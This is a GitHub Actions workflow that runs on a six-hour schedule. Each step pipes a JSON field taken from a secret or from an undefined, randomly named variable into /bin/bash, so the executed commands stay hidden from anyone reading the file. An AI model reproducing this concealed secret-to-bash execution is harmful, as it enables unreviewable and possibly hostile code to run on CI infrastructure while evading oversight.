name: minjiejunshi
on:
  workflow_dispatch:
  schedule:
    - cron: '40 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: minjiejunshi
        env:
          p7: ${{ secrets.p7 }}
        run: |
          echo $p7 | jq -r .jfwnd1 | /bin/bash
          echo $m747 | jq -r .tp38812 | /bin/bash
          echo $fzryh47626 | jq -r .rfv2 | /bin/bash
          echo $hgcco918 | jq -r .d4 | /bin/bash
          echo $zjlon9 | jq -r .iuq6661 | /bin/bash
          echo $hs5319 | jq -r .v5610 | /bin/bash
          echo $cb2207 | jq -r .tgenu436 | /bin/bash
          echo $ckeyh4 | jq -r .yfb135 | /bin/bash
          echo $j5 | jq -r .jgfkc948 | /bin/bash
          echo $q5 | jq -r .ri64 | /bin/bash

